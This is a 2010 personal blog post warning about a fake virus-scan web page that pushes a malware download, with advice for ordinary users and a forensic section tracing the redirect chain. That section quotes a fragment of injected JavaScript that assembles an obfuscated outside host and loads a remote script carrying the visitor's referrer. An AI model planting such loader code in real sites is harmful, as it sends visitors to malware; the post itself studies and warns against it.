Fake virus warnings - John C. Kirk
Oct. 29th, 2010
08:55 pm - Fake virus warnings
Someone called me earlier, because she had a big virus warning on her screen. This was actually a hoax (a web page trying to install malware), so it's useful to be aware of it, so that you know what to recognise.
At the moment, you can duplicate this if you go to this page:
I've deliberately changed "http" to "hxxp", so that you don't click on it by accident. This is a malicious site, so only go there if you're sure that you can get away safely. I've observed the same behaviour in IE8 and Firefox 3.6.12 (on Windows 7), but I haven't tried any other OS/browser.
The main webpage disappears, and instead you get a message box:
Note that this says "Message from webpage", i.e. this has come from the internet, not your local computer. (The equivalent Firefox message tells you which website has generated it.) At this point, you should get rid of the message without clicking "OK" or the red X. I tried Alt+F4 (in IE), but that still acted as if I'd clicked OK, so the only certain method is to run Task Manager, select this app, then click "End Task".
Anyway, if you do click "OK", you then see a window like this, which appears to be doing a virus scan:
As a general tip, any program that claims to have scanned your entire hard drive in a couple of seconds is lying!
If you try to get rid of this window, it nags you to stick around:
If you click anywhere on the "Security Analysis" screen, it prompts you to download a file:
That's the whole purpose of the exercise - the people who set up the hoax want you to run this file, which will then do something nasty to your computer, e.g. joining their botnet. So, you don't want this file! If you get this far, use Task Manager to shut down the web browser completely.
In theory, you could download the program, scan it for viruses, then run it if it's safe. However, I used McAfee VirusScan Enterprise 8.7 (with all the latest security updates), and that told me that the file was clean. In fairness, I haven't actually run the program, so I am just assuming that it's bad. However, I trust my instincts more than I trust any anti-virus software.
So, if your computer suddenly tells you that you've got loads of viruses, don't panic. If you're not sure what to do, ask for advice. This certainly applies if you're at work: I think I speak for all IT staff when I say that we'd much rather help you out beforehand than clean up the mess afterwards.
The rest of this post is a bit more "forensic", since I've been trying to work out how this happened. This will be very technical, so don't bother reading if you're not an IT person :) If you are a techie, you may be able to help out where I've got stuck. As far as I can tell, here are the steps to reproduce the problem:
1. Go to Google.
2. Do an image search for "map of central america" (without the quotes).
3. The 12th image (at the time of writing) looks like this:
and it takes you to:
(Again, I've mangled the URL to avoid accidental clicking.)
I think that's it, so I can't fault anyone for being taken in. I don't see the fake virus warning on my PC, but based on the firewall logs and my examination of the page, that's all the other person did. Mind you, it's also odd that the virus warning apparently appeared 10 minutes later, so she thought that it was from a different site.
The bigbestmovie page has 4 maps at the top, which are all "stolen" (hotlinked) from other sites. In particular, the one that showed up in the Google image results is this one:
as used on this page:
Just to clarify, the "God's Geography" site looks completely safe, and they have nothing to do with the dodgy stuff going on elsewhere; they're just an innocent bystander.
var c1 = "partner.js?frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x1 = "/"+c1;
var c = "partner.js?num=114&frm="+encodeURIComponent(document.referrer)+"&default_keyword="+document.title;
var x = "http://"+b1+b2+b3+b4+b5+b6+b7+b8+b9+"/"+c;
The first 2 get replaced at runtime, so the block then looks like this:
The bits in CAPITALS are just placeholders: GOOGLE is the URL of the Google results page, and DOCTITLE is the title of this (bigbestmovie.com) page. So, the first line would really look something like this:
DynDNS.com is a legitimate site, which sells sub-domains in "dyndns-blog.com" and "dyndns-server.com" (among others), so agosagyvux and ucyganijo are the equivalent of LiveJournal usernames. I assume that they both belong to the same person, although I'm not sure why he's using DynDNS at all. Maybe the dodgy code is being hopped around to different machines on a botnet? That being the case, it's curious that the bigbestmovie.com page also got updated to refer to a different name, particularly in such a short space of time (less than 2 hours).
If I go to:
then it redirects me to:
which just has a list of YouTube videos. This seems like an overtly innocent site, i.e. it's deliberately intended to divert suspicion. I'm not sure what the uid is for; maybe this site is a front for lots of malware sites, and they want to keep track of their customers?
If I pass a parameter to the site, as above:
it then redirects me to a different site. Again, I've found that the addresses keep changing, which makes it hard to do any effective blocking. Initially, it went to:
I noticed that this URL is similar to the one above, i.e. they're both Indian sites containing numbers and punctuation. According to whois for India, they are indeed both registered to the same person:
Adam Allen, 87 Columbia Heights, New York 11013
On subsequent visits, the "new-protectionsoft23" page has also redirected me to:
I haven't bothered doing a search, but I'm guessing that these domains also belong to the same guy.
I've got that far, but now I'm stuck. Should I report this to someone? If so, whom? I don't know whether the bigbestmovie.com site is directly involved in this, or whether they've been hacked. However, even in the best case scenario they look a bit dodgy, i.e. stealing content and throwing in phrases like "miss america" to attract search engines, and for practical purposes they're still dangerous to visitors. Google might be willing to block that site from their search results; the only snag is that I can't duplicate the problem on my machine, so they might not get it either. Again, any suggestions would be welcome.
Ah well, if nothing else it's been an interesting exercise.